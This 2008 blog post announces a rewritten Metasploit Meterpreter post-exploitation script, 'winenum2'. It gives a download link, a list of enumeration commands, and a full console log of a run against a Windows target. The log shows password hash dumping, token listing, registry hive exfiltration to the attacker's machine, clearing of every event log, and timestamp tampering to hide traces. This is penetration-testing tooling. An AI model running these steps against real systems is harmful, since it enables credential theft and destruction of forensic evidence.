Navigation
« Updated Winenum Script | Main | Ubuntu 8.10 Ruby Fix For Metasploit Released »
Sunday
Nov302008

Re-Wrote Winenum and added New Features to it

I just re-wrote the entire script and made it more modular, with better error handling and added anti-forensic features (Optional depending on the Rules of Engagement) and also added a check for detecting if the target machine is a VM for VMware or Virtual Box (Hyper-v and Citrix Xen will be added soon) The script has to be placed in the scripts/meterpreter/ folder in the root of the metasploit folder so to be able to use it.

http://www.darkoperator.com/winenum2.rb.tar.gz

The script will do the following:

Execute on the host and get the output for:

* set
* arp -a
* ipconfig /all
* ipconfig /displaydns
* route print
* net view
* netstat -na
* netstat -ns
* net share
* net view
* net group
* net user
* net localgroup
* net view /domain
* netsh firewall show config
* wmic computersystem list
* wmic useraccount list
* wmic group
* wmic service list brief
* wmic volume list brief
* wmic process list brief
* wmic startup list full
* wmic qfe

It will also :
* Check if the target machine is a VMware or Virtual Box VM
* Run meterpreter hashdump
* List all tokens on the server that can be used with Incognito
* export, compress and download all registry hives
* Clear all event logs
* Change the MACE of the executables used on the host.

Here is some output from meterpreter

meterpreter > run winenum2
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez@darkoperator.com
Usage:

-h This help message.

-a Run all commands including clearing event log and changing the
Changing Access Time, Modified Time and Created Time of executables
that where run on the target machine

-m Run all commands minus clearing the event logs and changing the MACE
of executables that where run in the target machine.
meterpreter >
meterpreter > run winenum2 -a
[*] Running Windows Local Enumeration Meterpreter Script by Darkoperator
[*] New session on 10.10.10.23:1149...
[*] Saving report to /tmp/10.10.10.23_20081130.270505021
[*] Checking if WINXPVM01 is a Virtual Machine ........
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -na
[*] running command netstat -ns
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] Running WMIC Commands ....
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group
[*] running command wimic service list brief
[*] running command wimic volume list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/HKCU.cab
[*] Downloading HKLM.cab to -> /tmp/HKLM.cab
[*] Downloading HKCC.cab to -> /tmp/HKCC.cab
[*] Downloading HKCR.cab to -> /tmp/HKCR.cab
[*] Downloading HKU.cab to -> /tmp/HKU.cab
[*] Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!

I hope you guys find it useful.

Reader Comments (3)

Very interesting, i will try it right now, nice work!

February 28, 2009 | Unregistered CommenterChristian Martorella
yeap!!! great script! just found your blog and reading it.....
February 16, 2010 | Unregistered CommenterA
Dude U Rule...
February 19, 2010 | Unregistered CommenterGod Bless You

PostPost a New Comment

Enter your information below to add a new comment.
Author Email (optional):
Author URL (optional):
Post:
 
All HTML will be escaped. Hyperlinks will be created for URLs automatically.